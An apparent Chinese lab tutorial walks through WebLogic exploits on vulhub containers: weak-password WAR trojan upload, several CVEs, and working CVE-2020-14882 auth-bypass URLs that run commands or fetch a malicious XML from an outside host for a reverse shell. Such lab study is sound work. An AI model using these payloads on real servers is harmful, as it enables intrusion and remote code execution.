WebLogic中间件常见漏洞

一、后台弱⼝令GetShell

1.环境搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

2.访问网站并登陆后台

/console/login/LoginForm.jsp 默认账号密码:weblogic/Oracle@123

3.点击部署,点击安装,点击上传文件

4.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传

然后⼀直下⼀步,直到完成

5. 访问部署好的war

二、CVE-2017-3506

1.环境搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

2. 验证是否存在wls-wsat组件

/wls-wsat/CoordinatorPortType

3.在当前页面抓包之后,添加下⾯请求包,反弹shell

三、 CVE-2019-2725

1.漏洞验证 ,访问/_async/AsyncResponseService 如果出现以下页面,则说明存在漏洞

2.在当前页面抓包 , 修改请求包 , 写⼊shell

3.访问下载到weblogic服务器上的木马,并进行连接

四、 CVE-2018-2628

1.环境搭建

cd vulhub-master/weblogic/CVE-2018-2628

docker-compose up -d

2. 访问网站

3. 利用工具

五、 CVE-2018-2894

1.环境搭建

cd vulhub-master/weblogic/CVE-2018-2894

docker-compose up -d

2. 访问/console/login/LoginForm.jsp,获取密码: docker-compose logs | grep password

3.设置web服务测试开启: 域结构 -> base-domain -> 高级 -> 启动Web服务测试页

3.点击保存 , 进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录,访问这个⽬ 录是⽆需权限的,这⼀点很重要

访问/ws_utc/config.do

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4. 点击安全 , 点击添加

右键审查元素 , 找到对应时间戳

5.工具连接

/ws_utc/css/config/keystore/1726815031601_2.jsp

六、 CVE-2020-14882

1.环境搭建

cd vulhub-master/weblogic/CVE-2020-14882

docker-compose up -d

2.访问管理控制台

/console/login/LoginForm.jsp

3. 使⽤以下url绕过登录认证

/console/css/%252e%252e%252fconsole.portal

4.首先访问以下 URL http://121.40.229.129:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")

进⼊到docker中可以看到命令已经成功运⾏了

**方式二:1.**制作⼀个恶意XML⽂件,将其提供到Weblogic可以访问得服务器上

2.然后通过以下 URL,Weblogic 将加载此 XML 并执⾏其中的命令

http://192.168.190.134:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.File SystemXmlApplicationContext("http://121.40.229.129:7001/1.xml")

成功接收到反弹的shell

相关推荐
BenSmith11 小时前
从零上手嵌入式 RTOS:以 Raspberry Pi Pico 2 WH 为例的烧录、定制构建与多系统对比指南
安全
汇智信科12 小时前
训练安全管理系统:赋能军消装备训练,实现全流程智能化管控
安全·训练安全管理·装备训练智能化·军事训练保障·消防训练管理
汤愈韬12 小时前
三种常用 NAT 的经典案例
网络协议·网络安全·security
汤愈韬13 小时前
NAT Server 与目的Nat
网络·网络协议·网络安全·security
其实防守也摸鱼15 小时前
CTF密码学综合教学指南--第三章
开发语言·网络·python·安全·网络安全·密码学
其实防守也摸鱼15 小时前
CTF密码学综合教学指南--第四章
网络·笔记·安全·网络安全·密码学·ctf
DevilSeagull15 小时前
电脑上安装的服务会自动消失? 推荐项目: localhostSCmanager. 更好管理你的服务!
测试工具·安全·react·vite·localhost·hono·trpc
@insist12316 小时前
信息安全-防火墙技术演进全景:从代理NAT 到下一代及专项防火墙
网络·安全·web安全·软考·信息安全工程师·软件水平考试
不会编程的懒洋洋17 小时前
C# P/Invoke 基础
开发语言·c++·笔记·安全·机器学习·c#·p/invoke
时空系18 小时前
第10篇:归属权与借用——Rust的安全保障 Rust中文编程
开发语言·安全·rust